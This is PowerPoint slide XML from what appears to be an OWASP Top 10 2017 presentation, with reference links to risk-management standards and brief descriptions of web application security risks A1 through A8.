                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId6"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>External</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>ISO 31000: Risk Management </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Std</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId8"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>ISO 27001: ISMS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>NIST Cyber Framework</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (US)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>ASD Strategic Mitigations (AU)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>NIST CVSS 3.0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Microsoft Threat Modelling Tool</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFil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8" name="Textplatzhalter 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321167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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Application Security Risks – 2017 </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41713193-AF8E-47ED-A0B1-8F6073105D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-685800" y="914400"/>
            <a:ext cx="8153400" cy="8001000"/>
            <a:chOff x="-609600" y="990600"/>
            <a:chExt cx="8153400" cy="8001000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5308A3-3666-418A-9AE6-240E4688F2BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-609600" y="990600"/>
              <a:ext cx="8153400" cy="8001000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1071787"/>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dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="995312"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A1:2017 Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1874768"/>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a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities (temporarily or permanently).</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="1798293"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A2:2017 Broken Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="2677749"/>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a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Freeform 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF109756-C917-4ECB-9826-AC54F0948B32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="2601274"/>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en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A3:2017  Sensitive Data Exposure</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="3480730"/>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kern="1200" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Freeform 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="3404256"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A4:2017 XML External Entity (XXE)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Freeform 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="4283711"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Freeform 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="4188334"/>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en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A5:2017 Broken Access Control</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1529380" y="5086692"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Security misconfiguration is the most common issue in the data, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all). </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Freeform 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5010218"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A6:2017 Security Misconfiguration</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Freeform 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="5889673"/>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a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Freeform 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5813199"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A7:2017 </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Cross-Site Scripting (XSS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Freeform 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E895283-6404-4647-9AED-A7928C930CB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="6692655"/>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algn="l" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Insecure deserialization flaws occur when an application receives hostile serialized objects. Insecure deserialization leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered or deleted to spoof users, conduct injection attacks, and elevate privileges. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Freeform 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="6616181"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A8:2017 Insecure Deserialization</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="7495636"/>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a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Freeform 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591F4221-9110-4B57-9D5B-633059706604}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="7419162"/>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Arial" charset="0"/>
